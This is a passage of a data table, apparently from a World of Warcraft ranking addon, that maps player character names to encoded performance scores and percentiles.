["Ceres"] = "LT:525/97%EB:622/82%EM:884/92%",
["Dbags"] = "LT:483/96%EB:714/93%LM:953/97%",
["Doomhammar"] = "UT:117/45%UB:331/38%RM:531/56%",
["Tagus"] = "ET:405/94%EB:543/93%EM:890/94%",
["Randomaction"] = "ET:223/88%EB:392/87%EM:690/86%",
["Durrty"] = "ET:307/86%EB:664/85%EM:886/91%",
["Wargonk"] = "RT:109/59%UB:133/45%CM:26/17%",
["Glexand"] = "CT:30/7%CB:177/22%UM:129/40%",
["Aeonic"] = "LT:456/95%EB:606/80%EM:885/92%",
["Rolfmayo"] = "CT:0/2%RM:678/74%",
["Heiwa"] = "LT:737/97%EB:554/87%EM:749/90%",
["Weedwhacker"] = "LT:766/97%EB:734/93%EM:906/92%",
["Batz"] = "RB:560/74%EM:707/75%",
["Skandal"] = "ET:561/88%LB:731/95%LM:738/95%",
["Quikone"] = "ST:725/99%SB:683/99%LM:930/98%",
["Rutujit"] = "LT:493/96%EB:563/92%EM:616/89%",
["Xazick"] = "UB:198/26%UM:358/41%",
["Drozull"] = "ET:577/78%LB:762/96%EM:905/93%",
["Addolorarsi"] = "CM:174/23%",
["Phoeníx"] = "RB:475/69%RM:677/74%",
["Kazuldal"] = "ET:643/84%EB:741/93%EM:797/83%",
["Hechicero"] = "CB:110/14%RM:533/62%",
["Marvick"] = "CT:0/6%UB:176/47%RM:240/63%",
["Chinesegirl"] = "ET:608/82%LB:790/98%LM:967/97%",
["Satanicaf"] = "RM:287/68%",
["Eggfarts"] = "UM:482/49%",
["Fromhel"] = "UT:86/31%CB:117/15%CM:68/9%",
["Ladie"] = "RT:359/60%RB:338/59%UM:207/25%",
["Slambo"] = "ET:343/90%EB:496/76%EM:818/91%",
["Bigmeats"] = "ET:621/87%LB:621/96%EM:865/93%",
["Uzü"] = "ET:402/92%EB:685/87%EM:915/94%",
["Malachor"] = "CT:2/0%UB:74/32%UM:141/34%",
["Lonelydruid"] = "UT:45/46%RB:275/69%EM:639/86%",
["Rngeezus"] = "ET:493/84%EB:444/85%EM:725/84%",
["Finalsparkk"] = "LT:452/95%EB:530/92%LM:925/95%",
["Vistiance"] = "ET:409/94%LB:594/95%LM:895/96%",
["Belwan"] = "LT:453/96%EB:567/94%EM:896/94%",
["Poakaman"] = "ET:271/86%EB:608/88%EM:725/88%",
["Chillsmoke"] = "ET:413/94%EB:461/87%EM:688/79%",
["Lockrobster"] = "LT:529/96%EB:578/92%EM:689/92%",
["Danford"] = "ET:320/87%EB:422/81%RM:698/74%",
["Sycoduck"] = "ET:346/88%EB:536/89%EM:861/89%",
["Evolym"] = "ET:412/94%EB:499/87%EM:917/94%",
["Dashopepper"] = "LT:444/95%LB:593/95%LM:915/95%",
["Dennisbadman"] = "LT:733/96%EB:720/92%LM:953/97%",
["Almandine"] = "ET:417/94%EB:467/88%EM:774/83%",
["Caiphas"] = "ET:265/85%SB:755/99%LM:917/97%",
["Akashik"] = "CB:30/1%CM:166/21%",
["Tazed"] = "UT:275/41%UB:106/26%UM:328/39%",
["Dianacoccus"] = "RT:433/57%RB:329/69%CM:32/2%",
["Mokokomass"] = "LT:752/97%LB:753/98%LM:845/95%",
["Barepipe"] = "ET:653/91%SB:782/99%LM:875/96%",
["Secrethero"] = "UB:350/46%RM:377/70%",
["Neura"] = "CB:34/1%UM:398/42%",
["Boebe"] = "UT:161/25%UB:380/49%UM:238/28%",
["Lilpimp"] = "ET:682/91%EB:636/86%EM:635/80%",
["Wallison"] = "ET:582/84%EB:570/81%EM:824/91%",
["Orphanofdark"] = "UT:324/45%EB:398/78%CM:67/23%",
["Zeitmrou"] = "ET:671/91%EB:568/94%EM:807/91%",
["Oxxy"] = "ET:694/92%EB:463/88%EM:690/84%",
["Twcrazysmorc"] = "ET:658/90%EB:659/89%EM:702/85%",
["Styxvii"] = "UT:238/45%RB:327/57%RM:247/74%",
["Petitdiable"] = "RT:420/57%RB:431/59%RM:359/71%",
["Xshao"] = "RT:533/72%EB:637/83%EM:755/79%",
["Dazdooga"] = "ET:347/75%RB:425/71%EM:550/87%",
["Claraa"] = "UT:104/37%UB:188/45%CM:74/9%",
["Gastlyhaunta"] = "LT:466/95%EB:669/86%RM:709/74%",
["Théodén"] = "RT:392/64%UB:389/49%UM:90/30%",
["Foxyphil"] = "ET:409/94%EB:727/92%EM:723/79%",
["Gelos"] = "ET:276/81%EB:406/78%EM:751/80%",
["Zehcnas"] = "LT:446/95%EB:669/90%EM:655/84%",
["Ghadhand"] = "UT:124/42%UB:325/44%UM:143/42%",
["Pallalujah"] = "RM:205/52%",
["Lukor"] = "ET:255/79%EB:720/94%RM:468/74%",
["Fenome"] = "RT:194/67%EB:586/81%EM:683/78%",
["Ares"] = "ET:391/94%EB:544/94%EM:758/88%",
["Alysspecter"] = "ET:414/92%EB:697/89%RM:665/69%",
["Sterick"] = "LT:509/96%EB:574/94%EM:881/94%",
["Azzar"] = "LT:771/97%EB:501/91%RM:582/68%",
["Broey"] = "ET:357/92%EB:741/94%EM:890/92%",
["Fowlbear"] = "ST:774/99%SB:813/99%SM:978/99%",
["Erickrodd"] = "LT:442/95%EB:569/94%EM:860/92%",
["Herting"] = "RT:121/53%RB:369/51%UM:360/42%",
["Vodkahealz"] = "UT:130/41%LB:699/95%EM:791/86%",
["Ec"] = "ET:276/78%EB:664/91%EM:873/92%",
["Cerealkilla"] = "RT:216/70%EB:588/75%RM:506/54%",
["Iklldepstein"] = "CT:63/22%CB:98/24%CM:51/5%",
["Ironrain"] = "RT:145/54%RB:465/61%RM:533/56%",
["Zyndrial"] = "UT:108/39%CB:60/6%CM:155/19%",
["Fontells"] = "RB:389/54%CM:233/23%",
["Armorbreaker"] = "RT:208/70%EB:395/77%EM:482/81%",
["Doubletea"] = "ET:258/79%RB:531/71%RM:608/67%",
["Randywatson"] = "CT:34/3%CB:115/14%CM:118/10%",
["Hatius"] = "ET:298/86%EB:667/87%UM:404/48%",
["Smootheze"] = "ET:244/77%RB:357/73%RM:227/55%",
["Stratics"] = "CT:94/16%UB:303/34%RM:538/57%",
["Tukuluku"] = "CT:0/2%UB:114/31%UM:441/46%",
["Evilslõth"] = "LT:431/95%EB:610/94%EM:627/89%",
["Kotojabda"] = "ST:616/99%SB:710/99%LM:931/97%",
["Gramox"] = "LT:645/98%LB:690/98%EM:810/91%",
["Sabermeow"] = "ET:615/81%RB:512/73%RM:456/58%",
["Stea"] = "ET:384/92%EB:465/85%RM:661/70%",
["Crownburger"] = "ET:419/86%LB:712/96%EM:585/81%",
["Animal"] = "ET:602/79%EB:732/92%EM:861/89%",
["Darkarrozz"] = "RT:214/72%EB:507/88%EM:776/81%",
["Flabberjack"] = "ET:556/81%EB:677/90%EM:853/92%",
["Tippsyybugg"] = "RT:145/53%RB:423/56%EM:705/77%",
["Vantar"] = "ET:620/82%EB:618/94%EM:858/88%",
["Gronel"] = "ET:681/91%LB:602/96%EM:876/93%",
["Smokey"] = "ET:435/79%EB:654/89%EM:859/93%",
["Daddy"] = "RT:182/64%EB:659/86%EM:870/91%",
["Zuell"] = "ET:233/75%EB:705/90%EM:893/93%",
["Viengo"] = "ET:662/90%LB:606/96%EM:886/94%",
["Hearsay"] = "RT:191/66%EB:712/91%LM:928/95%",
["Bigdestiny"] = "ST:793/99%LB:774/98%LM:918/97%",
["Khadmar"] = "RT:177/63%EB:607/80%EM:882/92%",
["Crazyirish"] = "ET:573/76%EB:739/94%LM:977/98%",
["Marseilles"] = "RT:186/65%LB:753/95%LM:927/95%",
["Archmage"] = "RT:205/69%EB:619/81%EM:859/90%",
["Dmtports"] = "CB:104/13%UM:147/48%",
["Hexc"] = "CB:66/7%UM:180/45%",
["Drkillinger"] = "CT:141/18%UB:111/31%RM:456/50%",
["Turnoround"] = "ET:360/89%RB:523/70%EM:415/76%",
["Walkingdeadl"] = "RT:524/69%EB:628/82%EM:407/75%",
["Finalsale"] = "ST:671/99%EB:594/82%EM:863/90%",
["Xiongyang"] = "LT:481/97%EB:647/92%EM:653/86%",
["Thomashardy"] = "UT:132/49%RB:384/55%RM:458/58%",
["Gnomorotica"] = "ET:259/77%EB:651/84%RM:650/70%",
["Titanmode"] = "ET:354/91%EB:678/91%EM:731/86%",
["Adraic"] = "CB:185/22%CM:196/18%",
["Hùnty"] = "CT:52/17%UB:341/47%RM:484/54%",
["Sometime"] = "LT:745/96%EB:677/90%EM:743/87%",
["Frzt"] = "EB:706/90%EM:808/86%",
["Arind"] = "CT:61/7%CB:186/23%UM:258/29%",
["Durkal"] = "LT:656/98%LB:651/96%EM:646/90%",
["Banwanda"] = "ST:703/99%LB:637/97%LM:832/98%",
["Gishii"] = "ST:632/99%LB:622/96%EM:454/88%",
["Eriuc"] = "CM:127/18%",
["Keliria"] = "ET:707/94%LB:656/98%EM:559/93%",
["Zfg"] = "UB:261/34%",
["Wapwapwapwap"] = "CM:2/0%",
["Undeep"] = "CB:162/19%UM:309/31%",
["Akina"] = "CB:92/9%",
["Allyara"] = "RT:178/61%UB:295/36%RM:633/68%",
["Aneous"] = "CB:77/9%",
["Hotmoomoo"] = "UT:119/46%UB:370/46%RM:232/56%",
["Geteven"] = "UB:372/47%UM:430/49%",
["Gibran"] = "UT:174/27%CB:172/22%UM:421/49%",
["Proletariate"] = "CB:70/8%UM:300/31%",
["Calx"] = "CB:147/18%",
["Rabid"] = "UB:173/34%",
["Dirue"] = "ET:695/94%EB:624/91%UM:234/46%",
["Liemarenzz"] = "RT:142/50%EB:435/81%EM:788/84%",
["Jjboom"] = "ST:790/99%LB:670/98%EM:767/92%",
["Wolvern"] = "LT:459/96%EB:714/93%LM:682/96%",
["Madcultist"] = "RT:187/62%EB:741/93%EM:922/94%",
["Ciarastrasza"] = "LT:447/95%EB:665/89%EM:501/90%",
["Primelegend"] = "ET:329/89%LB:749/95%LM:944/97%",
["Qos"] = "CB:164/19%UM:329/34%",
["Lerr"] = "RT:526/71%EB:527/89%EM:694/75%",
["Evava"] = "UT:308/41%EB:497/87%RM:326/69%",
["Faz"] = "ET:707/93%LB:631/97%EM:874/93%",
["Beardown"] = "LT:743/96%LB:717/96%LM:940/98%",
["Noxxion"] = "ET:690/92%EB:727/94%EM:839/92%",
["Vertalix"] = "CT:150/19%RB:456/62%CM:18/4%",
["Gunhaver"] = "EM:774/82%",
["Tokita"] = "RT:136/51%RB:475/62%UM:300/35%",
["Hooge"] = "CT:67/8%EB:705/90%EM:767/82%",
["Corpsessen"] = "RT:514/67%EB:584/92%EM:799/84%",
["Piforsale"] = "CT:67/6%UB:339/47%RM:577/67%",
["Rekanize"] = "ET:735/94%LB:751/95%EM:734/94%",
["Omegabirt"] = "CT:147/18%UB:283/39%RM:185/51%",
["Zenia"] = "CT:147/18%RB:416/55%EM:522/81%",
["Cënarius"] = "LT:365/96%EB:511/93%LM:604/95%",
["Lequeefa"] = "ET:394/85%EB:550/87%UM:58/30%",
["Panis"] = "ET:331/90%EB:689/91%EM:621/80%",
["Krakenmomo"] = "UT:224/32%EB:392/77%UM:218/26%",
["Drips"] = "ET:708/91%EB:729/92%EM:902/92%",
["Korriander"] = "RT:141/53%EB:489/86%RM:602/64%",
["Rrakka"] = "LT:741/95%SB:717/99%LM:928/96%",
["Intubate"] = "RT:517/65%EB:579/82%EM:664/77%",
["Snowcola"] = "ET:663/85%EB:722/91%LM:947/96%",
["Holymail"] = "RT:461/57%EB:654/89%EM:731/82%",
["Skrug"] = "ET:504/85%EB:671/91%EM:853/93%",
["Bazel"] = "RT:486/74%EB:736/93%RM:366/71%",
["Prosparo"] = "CT:0/3%UB:274/37%UM:274/28%",
["Myestro"] = "ET:657/86%LB:638/95%EM:932/94%",
["Kharneth"] = "ET:726/94%LB:607/96%EM:899/94%",
["Rylum"] = "ET:681/89%LB:661/97%EM:903/93%",
["Dbbl"] = "ET:439/87%EB:661/91%LM:869/95%",
["Troan"] = "ET:638/84%EB:732/92%LM:931/95%",
["Tankyoudaddi"] = "ET:682/88%LB:627/95%EM:684/92%",
["Icyhotpatch"] = "RT:181/64%RB:438/63%RM:568/62%",
["Rollingface"] = "ET:716/87%LB:653/97%EM:436/78%",
["Jeffyy"] = "RT:419/57%EB:458/84%EM:844/87%",
["Marigan"] = "RT:519/69%EB:590/93%EM:412/75%",
["Crisisv"] = "ET:700/90%LB:761/96%LM:956/96%",
["Yellaqt"] = "CT:74/9%CB:188/24%CM:189/22%",
["Bullyhunter"] = "RT:487/66%EB:674/87%RM:640/70%",
["Gwop"] = "UB:163/44%LM:889/95%",
["Coreyfeldman"] = "UB:201/47%CM:132/17%",
["Kaneis"] = "CB:26/0%UM:278/33%",
["Kryptonyt"] = "CB:100/12%UM:267/32%",
["Thuthengar"] = "ET:585/78%EB:610/79%EM:850/90%",
["Jgd"] = "ET:313/86%EB:377/80%EM:826/91%",
["Chillside"] = "EM:779/83%",
["Choucroute"] = "ET:679/88%LB:772/97%LM:793/96%",
["Praitica"] = "RT:549/74%EB:643/83%RM:539/61%",
["Rushhour"] = "RB:445/58%RM:704/73%",
["Davidias"] = "CT:119/15%EB:731/92%EM:914/92%",
["Tonty"] = "CT:30/2%CM:123/19%",
["Nikmir"] = "UT:274/35%EB:610/80%EM:731/78%",
["Gankestkhan"] = "UB:248/32%RM:501/56%",
["Smol"] = "ET:715/91%EB:605/79%EM:900/93%",
["Odinsson"] = "RT:159/55%EB:702/89%EM:865/89%",
["Heartstriker"] = "EM:744/79%",
["Asaprocky"] = "CT:36/4%RB:450/57%EM:452/76%",
["Cuttylicious"] = "RT:143/53%RB:335/70%RM:543/61%",
["Slowdown"] = "EB:616/81%LM:922/95%",
["Jonnyy"] = "LB:736/95%LM:892/95%",
["Idkfa"] = "UT:201/26%EB:652/84%EM:435/77%",
["Findne"] = "CB:45/10%",
["Pair"] = "EB:609/80%EM:855/88%",
["Blockobama"] = "RB:304/55%UM:186/49%",
["Vermeil"] = "EB:745/94%EM:856/88%",
["Dinero"] = "ET:729/93%EB:744/94%EM:533/85%",
["Heetsblue"] = "EB:567/79%EM:730/80%",
["Hoipolloi"] = "ST:797/99%SB:844/99%SM:1049/99%",
["Rurumbey"] = "RB:196/51%UM:319/38%",
["Mangoez"] = "ET:678/88%EB:728/92%EM:813/86%",
["Mahawka"] = "CT:67/6%RB:505/70%EM:853/90%",
["Auxilius"] = "UT:118/44%EB:590/78%EM:891/92%",
["Meatloafer"] = "RT:222/73%LB:755/95%LM:927/95%",
["Froo"] = "RT:162/65%EB:339/83%",
["Chadizzle"] = "UB:354/47%RM:357/68%",
["Thournehuf"] = "ET:247/80%EB:472/89%EM:846/92%",
["Zarix"] = "RT:186/65%EB:407/79%EM:723/77%",
["Chillx"] = "UT:106/41%RB:485/64%RM:569/63%",
["Brigoras"] = "CT:56/10%UB:116/32%RM:205/58%",
["Mexman"] = "ET:260/82%LB:601/96%EM:837/94%",
["Glitterbug"] = "RT:186/62%EB:468/84%RM:649/67%",
["Skraal"] = "RT:192/67%RB:319/68%RM:657/70%",
["Distortion"] = "UT:117/44%UB:188/25%UM:232/32%",
["Barz"] = "RT:197/68%RB:324/69%UM:336/33%",
["Huntuucing"] = "ET:300/81%EB:521/85%EM:632/84%",
["Etannos"] = "CT:148/23%CB:88/21%RM:513/58%",
["Icedd"] = "CT:26/0%RB:473/66%EM:566/90%",
["Gitdatazz"] = "CT:56/23%RB:297/64%UM:331/38%",
["Kucir"] = "CT:4/3%UM:69/25%",
["Silkz"] = "RT:185/63%RB:334/69%EM:782/81%",
["Claree"] = "CT:109/14%RB:262/59%RM:230/56%",
["Bigmeattreat"] = "RB:441/58%RM:493/56%",
["Nitemarcher"] = "RT:147/54%RB:403/56%RM:561/62%",
["Awwgeeze"] = "RT:222/70%EB:547/90%RM:649/67%",
["Invishobo"] = "ET:635/82%EB:697/89%EM:836/87%",
["Bulvar"] = "RT:138/63%RB:351/68%EM:594/77%",
["Aoezee"] = "EB:654/89%RM:540/66%",
["Seanboy"] = "ET:606/79%EB:709/90%EM:859/88%",
["Yaebashu"] = "UM:419/45%",
["Iha"] = "RB:436/59%UM:453/46%",
["Khanid"] = "RB:464/65%UM:391/46%",
["Snapthreat"] = "UB:311/38%UM:336/34%",
["Fixedgrapes"] = "UB:364/46%UM:250/29%",
["Qtpox"] = "UT:95/35%EB:636/83%RM:539/58%",
["Hermignome"] = "UT:254/32%UB:271/36%CM:38/4%",
["Maddragonfly"] = "CT:85/10%UB:232/30%RM:646/70%",
["Gaosibuluo"] = "CT:82/10%UB:203/26%UM:237/33%",
["Serdunk"] = "RT:193/67%EB:591/77%RM:358/71%",
["Kiddy"] = "CT:190/24%RB:274/64%UM:364/47%",
["Aoetard"] = "LT:529/97%EB:681/91%EM:568/89%",
["Galloloco"] = "UB:238/25%UM:291/29%",
["Sabriya"] = "CT:0/2%UB:264/35%UM:355/40%",
["Plexus"] = "CB:55/12%",
["Zorilla"] = "LT:437/95%LB:622/95%LM:936/95%",
["Caustix"] = "CB:190/21%UM:76/26%",
["Udinese"] = "UT:73/34%RB:256/63%RM:210/59%",
["Sanguan"] = "CB:127/17%UM:122/42%",
["Dexterdhima"] = "CT:72/13%CB:50/10%CM:45/15%",
["Juraganhayam"] = "CB:82/10%RM:218/60%",
["Bakedbeans"] = "CT:60/20%UB:91/25%UM:115/37%",
["Kranez"] = "ET:378/92%EB:581/93%EM:584/88%",
["Zuroth"] = "ET:352/92%EB:624/91%LM:732/98%",
["Stoont"] = "RT:152/53%RB:459/62%EM:454/77%",
["Awu"] = "RT:378/54%CB:87/9%RM:616/69%",
["Hitsdiffrent"] = "ET:722/92%LB:755/95%EM:747/81%",
["Joeyflex"] = "LT:527/97%EB:528/89%EM:770/83%",
["Xpdaddy"] = "CB:35/3%CM:192/18%",
["Frankenstina"] = "UT:115/41%RB:423/54%RM:487/50%",
["Goldfarmin"] = "SB:743/99%LM:798/97%",
["Aeolian"] = "RT:277/71%UB:133/45%EM:414/78%",
["Derg"] = "ST:695/99%LB:692/97%LM:816/96%",
["Sainight"] = "RT:215/72%CB:2/0%UM:141/41%",
["Amberloc"] = "ET:302/83%EB:541/90%EM:573/86%",
["Asapshocky"] = "RM:243/68%",
["Kuurb"] = "EB:396/78%RM:372/72%",
["Hoody"] = "CT:25/10%UB:275/37%",
["Zulkir"] = "EM:433/83%",
["Grifted"] = "LT:506/97%RB:305/73%EM:496/90%",
["Mstadobalina"] = "UT:116/44%UB:227/30%RM:457/50%",
["Cruisecontrl"] = "ET:172/83%EB:660/93%EM:846/94%",
["Desertmouse"] = "UT:93/36%EB:473/86%EM:737/78%",
["Averybug"] = "RB:332/74%RM:300/65%",
["Imho"] = "ST:773/99%LB:711/97%SM:934/99%",
["Simpinaintez"] = "RT:149/55%EB:618/80%EM:427/76%",
["Imnogood"] = "RB:544/74%EM:436/79%",
["Devie"] = "EB:390/77%EM:495/82%",
["Blight"] = "LB:618/97%RM:600/70%",
["Eigenwarrior"] = "UB:343/43%RM:508/54%",
["Karkaj"] = "EB:678/87%RM:542/60%",
["Lilbe"] = "LT:543/97%EB:645/88%EM:852/89%",
["Morticos"] = "RB:504/72%RM:363/73%",
["Haomeng"] = "RT:468/64%RB:533/72%RM:587/65%",
["Teslavie"] = "ET:593/85%EB:659/93%LM:852/96%",
["Dalbitt"] = "RT:466/62%EB:666/90%RM:581/71%",
["Cerseie"] = "EB:668/86%EM:788/83%",
["Exava"] = "ET:397/92%EB:722/92%EM:873/92%",
["Lilsqueeze"] = "EB:661/86%EM:816/85%",
["Hunteh"] = "CB:55/5%RM:235/59%",
["Amiss"] = "EB:502/77%EM:308/80%",
["Cassowary"] = "EB:625/82%EM:819/86%",
["Hahayeah"] = "ET:741/94%LB:758/96%LM:944/97%",
["Beefmane"] = "ET:622/82%EB:732/92%EM:813/87%",
["Marsmallowic"] = "UT:244/32%UB:236/32%CM:41/14%",
["Treekitty"] = "RT:421/55%RB:466/67%CM:127/15%",
["Peterpopoff"] = "UT:76/30%CB:200/23%UM:364/42%",
["Grndaddypurp"] = "RT:163/56%RB:534/71%RM:584/63%",
["Hoob"] = "CB:36/3%RM:547/61%",
["Brime"] = "ET:276/81%EB:436/81%EM:744/78%",
["Kswallow"] = "ET:572/75%EB:687/88%EM:870/90%",
["Marlowulf"] = "ET:380/93%LB:653/97%LM:898/96%",
["Dadomo"] = "ET:290/85%EB:374/75%RM:577/65%",
["Tweak"] = "LT:537/97%LB:779/98%LM:980/98%",
["Bigboifry"] = "ET:247/76%EB:605/79%EM:887/88%",
["Bètty"] = "ET:717/92%EB:626/82%EM:753/80%",
["Mandir"] = "ET:308/87%EB:696/89%EM:850/89%",
["Griznap"] = "ET:263/82%EB:654/84%RM:664/74%",
["Barbellbench"] = "ET:328/89%RB:578/74%RM:655/73%",
["Dubarh"] = "EB:582/82%EM:734/85%",
["Breshh"] = "EB:528/86%EM:299/79%",
["Tikes"] = "RB:437/62%RM:569/67%",
["Toniel"] = "CT:46/5%UB:296/39%",
["Cydechick"] = "RB:360/50%",
["Blackhuman"] = "UB:331/41%RM:622/67%",
["Kîllua"] = "UT:357/48%EB:667/86%RM:613/67%",
["Ramseybelts"] = "EB:639/89%RM:381/62%",
["Garman"] = "ET:627/88%LB:734/95%EM:849/92%",
["Kelotherio"] = "UB:335/42%UM:238/28%",
["Afghani"] = "LT:753/97%LB:741/97%LM:829/95%",
["Astoran"] = "ET:262/80%EB:735/93%EM:833/88%",
["Perchh"] = "ET:654/86%LB:576/95%LM:939/96%",
["Skippyiv"] = "UT:75/29%RB:384/53%",
["Zeerini"] = "UT:195/25%RB:391/54%RM:597/66%",
["Rainych"] = "RB:344/72%RM:319/68%",
["Snickerdoodl"] = "CT:108/14%UB:205/27%UM:400/45%",
["Majinbru"] = "EB:672/87%EM:717/93%",
["Smth"] = "EM:408/77%",
["Nottytroll"] = "EB:395/82%EM:476/86%",
["Malodor"] = "EB:686/91%EM:630/93%",
["Albireo"] = "UB:51/38%",
["Fckmage"] = "EB:535/93%RM:586/68%",
["Quetzlequeso"] = "CT:185/23%RB:552/73%RM:485/54%",
["Onyourmark"] = "ET:584/92%EB:679/94%EM:718/88%",
["Vhorbis"] = "ET:631/84%EB:725/92%EM:682/92%",
["Subwuff"] = "LT:715/95%LB:742/97%LM:931/98%",
["Zinchez"] = "EB:414/79%EM:337/82%",
["Ruggz"] = "EB:703/90%EM:691/92%",
["Ghorosh"] = "CT:124/20%UB:371/47%RM:237/57%",
["Spearz"] = "CT:38/3%EB:370/76%RM:337/71%",
["Polyrath"] = "CT:87/15%RB:543/72%EM:392/76%",
["Ghostystabs"] = "CB:62/7%UM:170/43%",
["Petä"] = "LT:749/97%EB:637/90%LM:876/95%",
["Whirlee"] = "UT:67/25%RB:461/67%UM:172/25%",
["Texn"] = "EB:437/80%EM:775/90%",
["Sparkler"] = "UT:95/37%EB:543/93%EM:670/79%",
["Aces"] = "UT:261/38%RB:412/50%EM:800/77%",
["Lulikaust"] = "CT:33/3%RM:418/53%",
["Tupacc"] = "CT:99/23%RB:218/50%RM:586/66%",
["Failynn"] = "EM:595/80%",
["Bogha"] = "EB:659/83%LM:941/96%",
["Tholo"] = "UT:74/26%UB:338/43%UM:396/42%",
["Veez"] = "UT:135/48%UB:221/28%RM:276/59%",
["Dafei"] = "UB:116/32%EM:348/76%",
["Shankk"] = "RT:432/57%RB:390/52%RM:288/60%",
["Abigailmarie"] = "ET:642/84%LB:717/95%EM:499/84%",
["Waternports"] = "UT:282/37%CB:168/21%RM:574/63%",
["Anuldelare"] = "RT:409/53%RB:451/60%RM:568/63%",
["Puote"] = "UB:98/26%RM:173/50%",
["Cuobsceness"] = "UT:236/30%RB:466/63%EM:488/81%",
["Rongmm"] = "CT:188/24%RB:220/51%UM:182/45%",
["Nicegril"] = "UT:237/30%RB:426/62%EM:432/83%",
["Ballsky"] = "RB:532/72%RM:353/72%",
["Flexgamer"] = "LB:739/96%LM:946/98%",
["Thatonegal"] = "UB:304/41%RM:511/60%",
["Bkingdom"] = "ET:279/83%EB:662/85%EM:676/75%",
["Goldencrow"] = "UB:364/49%UM:153/40%",
["Woshele"] = "CM:140/12%",
["Mlxlx"] = "UT:214/41%RB:530/70%RM:585/66%",
["Dragons"] = "RT:160/58%EB:413/80%EM:778/82%",
["Ezoverzz"] = "ET:241/76%EB:563/78%EM:708/81%",
["Wsjlock"] = "RT:506/68%EB:619/81%RM:531/57%",
["Vegandabs"] = "ET:593/79%EB:450/83%EM:763/82%",
["Merkyuh"] = "EB:577/76%EM:872/88%",
["Stealthee"] = "RM:621/68%",
["Sodanickle"] = "CB:61/7%UM:230/29%",
["Haalf"] = "RB:447/60%EM:421/76%",
["Wandfury"] = "UB:183/48%",
["Blessim"] = "EB:540/77%RM:572/66%",
["Warrbringer"] = "CT:30/12%CB:168/18%UM:409/47%",
["Carmagirl"] = "RT:498/68%EB:444/82%RM:602/67%",
["Swq"] = "EB:642/83%RM:623/66%",
["Jiajiajia"] = "UT:212/25%UB:304/42%UM:265/31%",
["Cmwd"] = "UT:232/35%EB:637/87%EM:774/87%",
["Orahu"] = "LT:718/95%EB:629/92%EM:796/90%",
["Bigbadboy"] = "ET:546/91%EB:525/94%EM:734/89%",
["Chiplets"] = "RM:627/69%",
["Kawraith"] = "RM:223/52%",
["Giina"] = "CM:159/15%",
["Propress"] = "EM:706/75%",
["Househusband"] = "RT:165/57%RB:513/69%EM:704/75%",
["Gukledivide"] = "RT:204/73%EB:493/90%",
["Shaster"] = "LB:764/96%EM:893/93%",
["Golfclub"] = "RB:358/74%UM:111/38%",
["Griffn"] = "EB:672/85%RM:594/63%",
["Chantlock"] = "CB:173/23%CM:171/17%",
["Kucf"] = "RT:199/60%EB:561/82%EM:664/82%",
["Parisgeller"] = "LT:471/95%EB:702/89%EM:846/87%",
["Deslocar"] = "CM:179/22%",
["Yamuu"] = "UB:158/43%RM:273/68%",
["Ragelock"] = "CB:19/1%UM:366/40%",
["Snoogans"] = "UB:134/37%EM:794/81%",
["Rouji"] = "CT:37/15%RB:263/59%EM:408/75%",
["Fatsquid"] = "RB:445/60%RM:499/56%",
["Aprilfools"] = "CB:129/15%CM:58/4%",
["Respechuman"] = "ET:363/92%EB:665/90%EM:739/87%",
["Judara"] = "CT:10/3%UB:128/33%CM:72/6%",
["Nyanbear"] = "RB:378/72%",
["Edaps"] = "UT:196/39%UB:357/45%CM:28/5%",
["Lunasa"] = "RB:457/60%RM:563/60%",
["Zeromxx"] = "LT:444/95%EB:689/92%EM:871/94%",
["Gnomereon"] = "ET:415/94%LB:775/98%EM:606/92%",
["Hongshaorou"] = "UB:263/36%UM:274/33%",
["Justtender"] = "RB:498/68%RM:690/73%",
["Zarakikenpa"] = "RT:459/61%EB:638/83%EM:716/77%",
["Lamm"] = "ET:722/94%LB:752/96%EM:839/93%",
["Tssbrip"] = "UT:318/42%EB:699/89%EM:843/87%",
["Imakeports"] = "RB:438/61%RM:488/57%",
["Sabrewülf"] = "UB:306/41%",
["Keige"] = "RB:493/67%CM:162/21%",
["Dasiniheihei"] = "RT:528/70%EB:510/88%EM:824/87%",
["Yngwiee"] = "CT:61/22%EB:364/79%EM:542/89%",
["Talibz"] = "UT:109/49%EB:564/79%EM:680/80%",
["Eviljadey"] = "EB:611/80%UM:132/40%",
["Honeyboboo"] = "RB:451/60%",
["Exorcyst"] = "RB:459/74%EM:671/82%",
["Magicmike"] = "RB:372/52%CM:147/20%",
["Fioren"] = "UB:361/46%UM:355/41%",
["Redflag"] = "RB:217/65%RM:257/57%",
["Alexanda"] = "UB:252/33%UM:112/37%",
["Prooff"] = "ET:590/77%EB:504/87%EM:794/83%",
["Shinslicer"] = "ET:666/90%EB:694/92%EM:774/90%",
["Jdstomp"] = "ET:359/91%EB:616/86%EM:745/87%",
["Vibraniumorc"] = "CB:43/4%UM:301/30%",
["Amariel"] = "CT:34/9%CB:111/13%UM:167/48%",
["Krunk"] = "EB:582/77%EM:785/84%",
["Jonnydazzles"] = "UM:387/44%",
["Ugongetshot"] = "RB:491/67%",
["Jagermusic"] = "UB:356/48%UM:377/43%",
["Potany"] = "RB:400/74%EM:466/79%",
["Dakial"] = "LT:455/96%LB:764/98%EM:812/93%",
["Slymaster"] = "RT:395/53%SB:803/99%LM:976/98%",
["Misspiggeh"] = "RB:508/69%EM:757/79%",
["Punchbuggy"] = "RB:536/71%UM:336/39%",
["Pandax"] = "ST:711/99%SB:710/99%SM:955/99%",
["Donniz"] = "CB:85/24%UM:276/33%",
["Lokthama"] = "ET:334/89%RB:547/72%EM:565/76%",
["Tyranttrumps"] = "ET:636/84%RB:460/66%CM:66/10%",
["Bluedot"] = "ET:305/84%RB:552/74%RM:353/70%",
["Galmage"] = "UB:102/29%UM:71/27%",
["Dramascus"] = "ET:390/88%LB:683/98%LM:915/96%",
["Pixcylz"] = "UT:46/48%CB:59/4%UM:162/46%",
["Stormzy"] = "ET:261/80%RB:413/57%RM:299/71%",
["Jezpalmi"] = "UB:176/44%RM:279/64%",
["Boneslee"] = "CT:155/21%RB:306/70%UM:132/43%",
["Liddle"] = "RT:210/62%LB:600/96%RM:353/71%",
["Bootybump"] = "CT:29/6%CB:67/8%RM:256/56%",
["Xonmyface"] = "UB:299/39%UM:253/25%",
["Mysterb"] = "RT:172/59%CB:158/20%RM:351/67%",
["Tweekn"] = "LT:546/97%EB:345/75%EM:434/83%",
["Shieldtroll"] = "CT:73/6%CB:60/12%UM:294/34%",
["Badvibes"] = "UB:266/34%UM:253/30%",
["Ceezy"] = "LT:596/98%LB:614/97%EM:550/87%",
["Sterilized"] = "ET:596/79%EB:642/83%EM:889/90%",
["Jdip"] = "RT:173/62%RB:281/64%RM:262/62%",
["Battlescarr"] = "ET:263/81%EB:483/87%RM:326/70%",
